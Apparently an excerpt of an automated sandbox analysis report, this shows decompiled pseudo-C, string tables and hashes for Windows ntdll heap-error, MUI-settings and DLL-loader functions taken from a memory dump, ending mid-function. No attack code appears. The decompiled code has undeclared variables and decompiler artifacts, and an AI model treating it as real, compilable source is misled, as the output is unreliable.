                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0116B323
                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0116B3D6
                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0116B305
                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0116B53F
                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0116B314
                                                          • write to, xrefs: 0116B4A6
                                                          • a NULL pointer, xrefs: 0116B4E0
                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0116B39B
                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0116B47D
                                                          • *** enter .cxr %p for the context, xrefs: 0116B50D
                                                          • The critical section is owned by thread %p., xrefs: 0116B3B9
                                                          • This failed because of error %Ix., xrefs: 0116B446
                                                          • *** then kb to get the faulting stack, xrefs: 0116B51C
                                                          • The instruction at %p tried to %s , xrefs: 0116B4B6
                                                          • an invalid address, %p, xrefs: 0116B4CF
                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0116B352
                                                          • The resource is owned exclusively by thread %p, xrefs: 0116B374
                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0116B48F
                                                          • <unknown>, xrefs: 0116B27E, 0116B2D1, 0116B350, 0116B399, 0116B417, 0116B48E
                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0116B2F3
                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0116B476
                                                          • *** Inpage error in %ws:%s, xrefs: 0116B418
                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0116B484
                                                          • Go determine why that thread has not released the critical section., xrefs: 0116B3C5
                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0116B2DC
                                                          • The resource is owned shared by %d threads, xrefs: 0116B37E
                                                          • *** enter .exr %p for the exception record, xrefs: 0116B4F1
                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0116B38F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • API String ID: 0-108210295
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E01171C06() {
                                                          				signed int _t27;
                                                          				char* _t104;
                                                          				char* _t105;
                                                          				intOrPtr _t113;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t117;
                                                          				intOrPtr _t119;
                                                          				intOrPtr _t120;
                                                          
                                                          				_t105 = 0x10948a4;
                                                          				_t104 = "HEAP: ";
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push( *0x11a589c);
                                                          				E010BB150("Heap error detected at %p (heap handle %p)\n",  *0x11a58a0);
                                                          				_t27 =  *0x11a5898; // 0x0
                                                          				if(_t27 <= 0xf) {
                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01171E96))) {
                                                          						case 0:
                                                          							_t105 = "heap_failure_internal";
                                                          							goto L21;
                                                          						case 1:
                                                          							goto L21;
                                                          						case 2:
                                                          							goto L21;
                                                          						case 3:
                                                          							goto L21;
                                                          						case 4:
                                                          							goto L21;
                                                          						case 5:
                                                          							goto L21;
                                                          						case 6:
                                                          							goto L21;
                                                          						case 7:
                                                          							goto L21;
                                                          						case 8:
                                                          							goto L21;
                                                          						case 9:
                                                          							goto L21;
                                                          						case 0xa:
                                                          							goto L21;
                                                          						case 0xb:
                                                          							goto L21;
                                                          						case 0xc:
                                                          							goto L21;
                                                          						case 0xd:
                                                          							goto L21;
                                                          						case 0xe:
                                                          							goto L21;
                                                          						case 0xf:
                                                          							goto L21;
                                                          					}
                                                          				}
                                                          				L21:
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push(_t105);
                                                          				E010BB150("Error code: %d - %s\n",  *0x11a5898);
                                                          				_t113 =  *0x11a58a4; // 0x0
                                                          				if(_t113 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter1: %p\n",  *0x11a58a4);
                                                          				}
                                                          				_t115 =  *0x11a58a8; // 0x0
                                                          				if(_t115 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter2: %p\n",  *0x11a58a8);
                                                          				}
                                                          				_t117 =  *0x11a58ac; // 0x0
                                                          				if(_t117 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter3: %p\n",  *0x11a58ac);
                                                          				}
                                                          				_t119 =  *0x11a58b0; // 0x0
                                                          				if(_t119 != 0) {
                                                          					L41:
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					_push( *0x11a58b4);
                                                          					E010BB150("Last known valid blocks: before - %p, after - %p\n",  *0x11a58b0);
                                                          				} else {
                                                          					_t120 =  *0x11a58b4; // 0x0
                                                          					if(_t120 != 0) {
                                                          						goto L41;
                                                          					}
                                                          				}
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				return E010BB150("Stack trace available at %p\n", 0x11a58c0);
                                                          			}












                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                          • API String ID: 0-2897834094
                                                          • Opcode ID: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                          • Instruction ID: 77767ab52b75f3e53c590baa358a13f09f4292d1bd9eb5528b1371dd471879ac
                                                          • Opcode Fuzzy Hash: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                          • Instruction Fuzzy Hash: 09610332524141EFD72DABCAD488E6477B9EB14970BCA843EF9895F301DB349C808F4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E010C3D34(signed int* __ecx) {
                                                          				signed int* _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				signed int* _v20;
                                                          				char _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int* _v48;
                                                          				signed int* _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				char _v68;
                                                          				signed int _t140;
                                                          				signed int _t161;
                                                          				signed int* _t236;
                                                          				signed int* _t242;
                                                          				signed int* _t243;
                                                          				signed int* _t244;
                                                          				signed int* _t245;
                                                          				signed int _t255;
                                                          				void* _t257;
                                                          				signed int _t260;
                                                          				void* _t262;
                                                          				signed int _t264;
                                                          				void* _t267;
                                                          				signed int _t275;
                                                          				signed int* _t276;
                                                          				short* _t277;
                                                          				signed int* _t278;
                                                          				signed int* _t279;
                                                          				signed int* _t280;
                                                          				short* _t281;
                                                          				signed int* _t282;
                                                          				short* _t283;
                                                          				signed int* _t284;
                                                          				void* _t285;
                                                          
                                                          				_v60 = _v60 | 0xffffffff;
                                                          				_t280 = 0;
                                                          				_t242 = __ecx;
                                                          				_v52 = __ecx;
                                                          				_v8 = 0;
                                                          				_v20 = 0;
                                                          				_v40 = 0;
                                                          				_v28 = 0;
                                                          				_v32 = 0;
                                                          				_v44 = 0;
                                                          				_v56 = 0;
                                                          				_t275 = 0;
                                                          				_v16 = 0;
                                                          				if(__ecx == 0) {
                                                          					_t280 = 0xc000000d;
                                                          					_t140 = 0;
                                                          					L50:
                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                          					_t242[0x13] = _t140;
                                                          					_t242[0x16] = _v40;
                                                          					_t242[0x18] = _v28;
                                                          					_t242[0x14] = _v32;
                                                          					_t242[0x17] = _t275;
                                                          					_t242[0x15] = _v44;
                                                          					_t242[0x11] = _v56;
                                                          					_t242[0x12] = _v60;
                                                          					return _t280;
                                                          				}
                                                          				if(E010C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v56 = 1;
                                                          					if(_v8 != 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                          					}
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E010C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v60 =  *_v8;
                                                          					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E010C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          					L16:
                                                          					if(E010C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          						L28:
                                                          						if(E010C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                          							L46:
                                                          							_t275 = _v16;
                                                          							L47:
                                                          							_t161 = 0;
                                                          							L48:
                                                          							if(_v8 != 0) {
                                                          								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                          							}
                                                          							_t140 = _v20;
                                                          							if(_t140 != 0) {
                                                          								if(_t275 != 0) {
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                          									_t275 = 0;
                                                          									_v28 = 0;
                                                          									_t140 = _v20;
                                                          								}
                                                          							}
                                                          							goto L50;
                                                          						}
                                                          						_t167 = _v12;
                                                          						_t255 = _v12 + 4;
                                                          						_v44 = _t255;
                                                          						if(_t255 == 0) {
                                                          							_t276 = _t280;
                                                          							_v32 = _t280;
                                                          						} else {
                                                          							_t276 = L010D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                          							_t167 = _v12;
                                                          							_v32 = _t276;
                                                          						}
                                                          						if(_t276 == 0) {
                                                          							_v44 = _t280;
                                                          							_t280 = 0xc0000017;
                                                          							goto L46;
                                                          						} else {
                                                          							E010FF3E0(_t276, _v8, _t167);
                                                          							_v48 = _t276;
                                                          							_t277 = E01101370(_t276, 0x1094e90);
                                                          							_pop(_t257);
                                                          							if(_t277 == 0) {
                                                          								L38:
                                                          								_t170 = _v48;
                                                          								if( *_v48 != 0) {
                                                          									E010FBB40(0,  &_v68, _t170);
                                                          									if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          										_t280 =  &(_t280[0]);
                                                          									}
                                                          								}
                                                          								if(_t280 == 0) {
                                                          									_t280 = 0;
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                          									_v44 = 0;
                                                          									_v32 = 0;
                                                          								} else {
                                                          									_t280 = 0;
                                                          								}
                                                          								_t174 = _v8;
                                                          								if(_v8 != 0) {
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                          								}
                                                          								_v8 = _t280;
                                                          								goto L46;
                                                          							}
                                                          							_t243 = _v48;
                                                          							do {
                                                          								 *_t277 = 0;
                                                          								_t278 = _t277 + 2;
                                                          								E010FBB40(_t257,  &_v68, _t243);
                                                          								if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          									_t280 =  &(_t280[0]);
                                                          								}
                                                          								_t243 = _t278;
                                                          								_t277 = E01101370(_t278, 0x1094e90);
                                                          								_pop(_t257);
                                                          							} while (_t277 != 0);
                                                          							_v48 = _t243;
                                                          							_t242 = _v52;
                                                          							goto L38;
                                                          						}
                                                          					}
                                                          					_t191 = _v12;
                                                          					_t260 = _v12 + 4;
                                                          					_v28 = _t260;
                                                          					if(_t260 == 0) {
                                                          						_t275 = _t280;
                                                          						_v16 = _t280;
                                                          					} else {
                                                          						_t275 = L010D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                          						_t191 = _v12;
                                                          						_v16 = _t275;
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						_v28 = _t280;
                                                          						_t280 = 0xc0000017;
                                                          						goto L47;
                                                          					} else {
                                                          						E010FF3E0(_t275, _v8, _t191);
                                                          						_t285 = _t285 + 0xc;
                                                          						_v48 = _t275;
                                                          						_t279 = _t280;
                                                          						_t281 = E01101370(_v16, 0x1094e90);
                                                          						_pop(_t262);
                                                          						if(_t281 != 0) {
                                                          							_t244 = _v48;
                                                          							do {
                                                          								 *_t281 = 0;
                                                          								_t282 = _t281 + 2;
                                                          								E010FBB40(_t262,  &_v68, _t244);
                                                          								if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          									_t279 =  &(_t279[0]);
                                                          								}
                                                          								_t244 = _t282;
                                                          								_t281 = E01101370(_t282, 0x1094e90);
                                                          								_pop(_t262);
                                                          							} while (_t281 != 0);
                                                          							_v48 = _t244;
                                                          							_t242 = _v52;
                                                          						}
                                                          						_t201 = _v48;
                                                          						_t280 = 0;
                                                          						if( *_v48 != 0) {
                                                          							E010FBB40(_t262,  &_v68, _t201);
                                                          							if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          								_t279 =  &(_t279[0]);
                                                          							}
                                                          						}
                                                          						if(_t279 == 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                          							_v28 = _t280;
                                                          							_v16 = _t280;
                                                          						}
                                                          						_t202 = _v8;
                                                          						if(_v8 != 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                          						}
                                                          						_v8 = _t280;
                                                          						goto L28;
                                                          					}
                                                          				}
                                                          				_t214 = _v12;
                                                          				_t264 = _v12 + 4;
                                                          				_v40 = _t264;
                                                          				if(_t264 == 0) {
                                                          					_v20 = _t280;
                                                          				} else {
                                                          					_t236 = L010D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                          					_t280 = _t236;
                                                          					_v20 = _t236;
                                                          					_t214 = _v12;
                                                          				}
                                                          				if(_t280 == 0) {
                                                          					_t161 = 0;
                                                          					_t280 = 0xc0000017;
                                                          					_v40 = 0;
                                                          					goto L48;
                                                          				} else {
                                                          					E010FF3E0(_t280, _v8, _t214);
                                                          					_t285 = _t285 + 0xc;
                                                          					_v48 = _t280;
                                                          					_t283 = E01101370(_t280, 0x1094e90);
                                                          					_pop(_t267);
                                                          					if(_t283 != 0) {
                                                          						_t245 = _v48;
                                                          						do {
                                                          							 *_t283 = 0;
                                                          							_t284 = _t283 + 2;
                                                          							E010FBB40(_t267,  &_v68, _t245);
                                                          							if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          								_t275 = _t275 + 1;
                                                          							}
                                                          							_t245 = _t284;
                                                          							_t283 = E01101370(_t284, 0x1094e90);
                                                          							_pop(_t267);
                                                          						} while (_t283 != 0);
                                                          						_v48 = _t245;
                                                          						_t242 = _v52;
                                                          					}
                                                          					_t224 = _v48;
                                                          					_t280 = 0;
                                                          					if( *_v48 != 0) {
                                                          						E010FBB40(_t267,  &_v68, _t224);
                                                          						if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          							_t275 = _t275 + 1;
                                                          						}
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                          						_v40 = _t280;
                                                          						_v20 = _t280;
                                                          					}
                                                          					_t225 = _v8;
                                                          					if(_v8 != 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                          					}
                                                          					_v8 = _t280;
                                                          					goto L16;
                                                          				}
                                                          			}

                                                          Strings
                                                          • Kernel-MUI-Language-Allowed, xrefs: 010C3DC0
                                                          • WindowsExcludedProcs, xrefs: 010C3D6F
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 010C3E97
                                                          • Kernel-MUI-Number-Allowed, xrefs: 010C3D8C
                                                          • Kernel-MUI-Language-SKU, xrefs: 010C3F70
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                          • Instruction ID: c2b17831431e0bfa39af0513f58992605d2ed05084108f4ce3175b741de74a87
                                                          • Opcode Fuzzy Hash: ba8e56ab4d2a6cb88560ed4b1c80a3962531af4927bff988ea767b08324f6340
                                                          • Instruction Fuzzy Hash: 3CF15E72D10219EFCB16DF98C980AEEBBB9FF48A50F15406AE545EB250D7749E01CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E010E8E00(void* __ecx) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t43;
                                                          				void* _t46;
                                                          				intOrPtr _t47;
                                                          				void* _t48;
                                                          				signed int _t49;
                                                          				void* _t50;
                                                          				intOrPtr* _t51;
                                                          				signed int _t52;
                                                          				void* _t53;
                                                          				intOrPtr _t55;
                                                          
                                                          				_v8 =  *0x11ad360 ^ _t52;
                                                          				_t49 = 0;
                                                          				_t48 = __ecx;
                                                          				_t55 =  *0x11a8464; // 0x75150110
                                                          				if(_t55 == 0) {
                                                          					L9:
                                                          					if( !_t49 >= 0) {
                                                          						if(( *0x11a5780 & 0x00000003) != 0) {
                                                          							E01135510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                          						}
                                                          						if(( *0x11a5780 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          					}
                                                          					return E010FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                          				}
                                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                          				_t43 =  *0x11a7984; // 0xc42b60
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                          					if(_t48 == _t43) {
                                                          						_t50 = 0x5c;
                                                          						if( *_t32 == _t50) {
                                                          							_t46 = 0x3f;
                                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                          								_t32 = _t32 + 8;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t51 =  *0x11a8464; // 0x75150110
                                                          					 *0x11ab1e0(_t47, _t32,  &_v12);
                                                          					_t49 =  *_t51();
                                                          					if(_t49 >= 0) {
                                                          						L8:
                                                          						_t35 = _v12;
                                                          						if(_t35 != 0) {
                                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                          								E010E9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                          								_t35 = _v12;
                                                          							}
                                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					if(_t49 != 0xc000008a) {
                                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                          							if(_t49 != 0xc00000bb) {
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					if(( *0x11a5780 & 0x00000005) != 0) {
                                                          						_push(_t49);
                                                          						E01135510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                          						_t53 = _t53 + 0x1c;
                                                          					}
                                                          					_t49 = 0;
                                                          					goto L8;
                                                          				} else {
                                                          					goto L9;
                                                          				}
                                                          			}

                                                          Strings
                                                          • LdrpFindDllActivationContext, xrefs: 01129331, 0112935D
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0112933B, 01129367
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01129357
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0112932A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 0-3779518884
                                                          • Opcode ID: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                          • Instruction ID: 8352014c59f4aa9ffd73e6a728855968e8fd09fb9e669915c9d316a5dc861039
                                                          • Opcode Fuzzy Hash: 85c4d6b807b07fc5bb1a3bae15e90e457a9c317465aa834da587211a47a747e4
                                                          • Instruction Fuzzy Hash: 35412932A043159FDFBAAA5EC84CA7ABAE5AB00358F46C1BBD9D457351E7706DC08381
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E010C8794(void* __ecx) {
                                                          				signed int _v0;
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v40;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t77;
                                                          				signed int _t80;
                                                          				signed char _t81;
                                                          				signed int _t87;
                                                          				signed int _t91;
                                                          				void* _t92;
                                                          				void* _t94;
                                                          				signed int _t95;
                                                          				signed int _t103;
                                                          				signed int _t105;
                                                          				signed int _t110;
                                                          				signed int _t118;
                                                          				intOrPtr* _t121;
                                                          				intOrPtr _t122;
                                                          				signed int _t125;
                                                          				signed int _t129;
                                                          				signed int _t131;
                                                          				signed int _t134;
                                                          				signed int _t136;
                                                          				signed int _t143;
                                                          				signed int* _t147;
                                                          				signed int _t151;
                                                          				void* _t153;
                                                          				signed int* _t157;
                                                          				signed int _t159;
                                                          				signed int _t161;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          
                                                          				_push(__ecx);
                                                          				_t153 = __ecx;
                                                          				_t159 = 0;
                                                          				_t121 = __ecx + 0x3c;
                                                          				if( *_t121 == 0) {
                                                          					L2:
                                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                          							L6:
                                                          							if(E010C934A() != 0) {
                                                          								_t159 = E0113A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                          								__eflags = _t159;
                                                          								if(_t159 < 0) {
                                                          									_t81 =  *0x11a5780; // 0x0
                                                          									__eflags = _t81 & 0x00000003;
                                                          									if((_t81 & 0x00000003) != 0) {
                                                          										_push(_t159);
                                                          										E01135510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                          										_t81 =  *0x11a5780; // 0x0
                                                          									}
                                                          									__eflags = _t81 & 0x00000010;
                                                          									if((_t81 & 0x00000010) != 0) {
                                                          										asm("int3");
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t159 = E010C849B(0, _t122, _t153, _t159, _t180);
                                                          							if(_t159 >= 0) {
                                                          								goto L6;
                                                          							}
                                                          						}
                                                          						_t80 = _t159;
                                                          						goto L8;
                                                          					} else {
                                                          						_t125 = 0x13;
                                                          						asm("int 0x29");
                                                          						_push(0);
                                                          						_push(_t159);
                                                          						_t161 = _t125;
                                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                          						_t143 = 0;
                                                          						_v40 = _t161;
                                                          						_t118 = 0;
                                                          						_push(_t153);
                                                          						__eflags = _t87;
                                                          						if(_t87 != 0) {
                                                          							_t118 = _t87 + 0x5d8;
                                                          							__eflags = _t118;
                                                          							if(_t118 == 0) {
                                                          								L46:
                                                          								_t118 = 0;
                                                          							} else {
                                                          								__eflags =  *(_t118 + 0x30);
                                                          								if( *(_t118 + 0x30) == 0) {
                                                          									goto L46;
                                                          								}
                                                          							}
                                                          						}
                                                          						_v32 = 0;
                                                          						_v28 = 0;
                                                          						_v16 = 0;
                                                          						_v20 = 0;
                                                          						_v12 = 0;
                                                          						__eflags = _t118;
                                                          						if(_t118 != 0) {
                                                          							__eflags = _t161;
                                                          							if(_t161 != 0) {
                                                          								__eflags =  *(_t118 + 8);
                                                          								if( *(_t118 + 8) == 0) {
                                                          									L22:
                                                          									_t143 = 1;
                                                          									__eflags = 1;
                                                          								} else {
                                                          									_t19 = _t118 + 0x40; // 0x40
                                                          									_t156 = _t19;
                                                          									E010C8999(_t19,  &_v16);
                                                          									__eflags = _v0;
                                                          									if(_v0 != 0) {
                                                          										__eflags = _v0 - 1;
                                                          										if(_v0 != 1) {
                                                          											goto L22;
                                                          										} else {
                                                          											_t128 =  *(_t161 + 0x64);
                                                          											__eflags =  *(_t161 + 0x64);
                                                          											if( *(_t161 + 0x64) == 0) {
                                                          												goto L22;
                                                          											} else {
                                                          												E010C8999(_t128,  &_v12);
                                                          												_t147 = _v12;
                                                          												_t91 = 0;
                                                          												__eflags = 0;
                                                          												_t129 =  *_t147;
                                                          												while(1) {
                                                          													__eflags =  *((intOrPtr*)(0x11a5c60 + _t91 * 8)) - _t129;
                                                          													if( *((intOrPtr*)(0x11a5c60 + _t91 * 8)) == _t129) {
                                                          														break;
                                                          													}
                                                          													_t91 = _t91 + 1;
                                                          													__eflags = _t91 - 5;
                                                          													if(_t91 < 5) {
                                                          														continue;
                                                          													} else {
                                                          														_t131 = 0;
                                                          														__eflags = 0;
                                                          													}
                                                          													L37:
                                                          													__eflags = _t131;
                                                          													if(_t131 != 0) {
                                                          														goto L22;
                                                          													} else {
                                                          														__eflags = _v16 - _t147;
                                                          														if(_v16 != _t147) {
                                                          															goto L22;
                                                          														} else {
                                                          															E010D2280(_t92, 0x11a86cc);
                                                          															_t94 = E01189DFB( &_v20);
                                                          															__eflags = _t94 - 1;
                                                          															if(_t94 != 1) {
                                                          															}
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
